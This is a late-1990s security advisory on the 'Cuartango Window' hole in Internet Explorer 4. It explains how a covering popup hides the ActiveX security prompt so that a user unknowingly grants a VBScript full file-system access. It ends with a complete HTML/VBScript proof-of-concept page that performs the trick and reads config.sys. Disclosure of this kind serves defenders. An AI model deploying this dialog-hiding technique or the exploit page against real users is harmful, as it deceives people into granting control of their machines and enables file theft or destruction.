Cuartango Window 

http://pages.whowhere.com/computers/cuartangojc/cuartangow1.html

Affected software
Microsoft Internet Explorer 4


Risks
Your computer is at risk a malicious VBScript can get full control over your system.
The VBScript can de everything : delete files, install viruses, read your files ...


Technical description
                      When Microsoft Internet Explorer detects that a Visual Basic Script included in an HTML page will
                      create an object ("CreateObject" sentence)  your file system a security alert dialog is displayed :



                      Nobody with a minimum knowledge about ActiveX and VB Scripts would accept this dialog. If you click
                      the "yes" button your have given FULL CONTROL of your machine to the VB Script code.
                      The vulnerability comes from the fact that is possibleto hide this dialog box and get FULL CONTROL
                      over the victim machine.  
                      The key idea is very simple : just display a window over the security alert hiding the message and
                      replacing it by another friendly message but keeping visible the buttons of the original message.

                      I will show you how the malicious script will work   :

                      First we open a friendly window (The Cuartango Window) :

                      set wcover = window.open ("welcome.htm", "Welcome . . . )

                      Next instruction will generate the security alert because we are accesing the file system this
                      prompt will be behind the welcome window  !!!

                      Set fs = CreateObject("Scripting.FileSystemObject")

                      At this moment instead of the alert shown above what we see is :



                       

                      If the YES button is clicked the script has FULL CONTROL. The welcome window in no longer needed and
                      we close it

                      wcover.close

                      At this point we are the script owns   the machine as an, example I will get the autoexec.bat file
                      and display it in a text box. But the script could do everything on your machine, delete all your
                      files, install a virus ...

                      Set myfile = fs.OpenTextFile("c:\config.sys")
                      content = myfile.readall
                      myfile.Close
                      document.form1.s1.value = content


----------exploit code example----------

<html>

<head>
<meta name="description" content="Explorer vulnerability : Cuartango Window hole">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<meta name="keywords"
content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>Cuartango Window demo</title>
</head>

<body bgcolor="#C0C0C0">
<script language="VBScript">

if instr(1,navigator.userAgent,"MSIE") = 0 then 
        msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye"
        window.navigate "http://www.microsoft.com"
end if
if window.screen.width <> 800 then       
        alert "Your screen resolution must be 800 x 600"
        window.navigate "cuartangow1.html"
else   ' coordinates given for 800 x 600
        set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")
        Set fs = CreateObject("Scripting.FileSystemObject")
        wcover.close
        Set myfile = fs.OpenTextFile("c:\config.sys")
        content = myfile.readall
        myfile.Close
end if

</script>


<h1 align="center"><font color="#FF0000">Cuartango Window Demo</font></h1>

<p align="center"><strong>This example shows you how ActiveX could destroy your system.
&nbsp; As an example I have read your config.sys file</strong><br>
Back to <a href="cuartangow1.html">Cuartango Window Page</a></p>

<form method="POST" name="form1">
  <div align="center"><center><p><textarea rows="18" name="S1" cols="49"></textarea></p>
  </center></div>
</form>
<script language="VBScript">

 document.form1.s1.value = content

</script>


<p>&nbsp;</p>
</body>
</html>